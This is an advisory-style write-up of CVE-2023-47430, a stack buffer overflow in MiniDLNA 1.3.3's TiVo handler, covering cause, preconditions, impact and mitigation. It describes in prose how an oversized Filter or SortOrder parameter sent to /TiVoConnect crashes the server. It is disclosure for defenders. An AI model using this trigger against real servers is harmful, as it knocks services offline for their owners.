CVE-2023-47430

Vulnerability

A stack-buffer-overflow vulnerability exists in ReadyMedia (MiniDLNA) version 1.3.3 in the SendContainer() function within tivo_commands.c. The issue arises from a lack of proper boundary checks when strcat() is called on variables order, order2, and myfilter. This allows an attacker to overflow fixed-size stack buffers by providing excessively long values in the Filter or SortOrder parameters of a crafted HTTP request [1][2].

Exploitation

An attacker must be able to send HTTP requests to the MiniDLNA server (default port 8200) and the server must be configured with enable_tivo=yes in minidlna.conf. No authentication is required. The bug is triggered by sending a GET request to the endpoint /TiVoConnect with the Command=QueryContainer, a Container value, and a long series of comma-separated entries in the Filter or SortOrder parameter. The example references show that a string of 19 or more repetitions of a type (e.g., video,video,...) or a very long SortOrder causes the overflow [1][2].

Impact

The attacker can cause a denial of service (DoS) by corrupting the stack, which likely crashes the minidlnad process. The CVSS score is 5.3 (Medium) with low attack complexity and no privileges required. While the bug is a stack-buffer-overflow, exploitation for code execution is not described in the available references; the reported impact is limited to availability [1][2].

Mitigation

As of the publication date (2024-03-25), no patched version of ReadyMedia (MiniDLNA) has been officially released for this CVE. The project appears to be inactive or unmaintained; the last stable release is v1.3.3. Users should consider disabling the TiVo support feature (set enable_tivo=no in minidlna.conf) if it is not required, or switch to alternative DLNA media server software. No known KEV listing exists [1][2].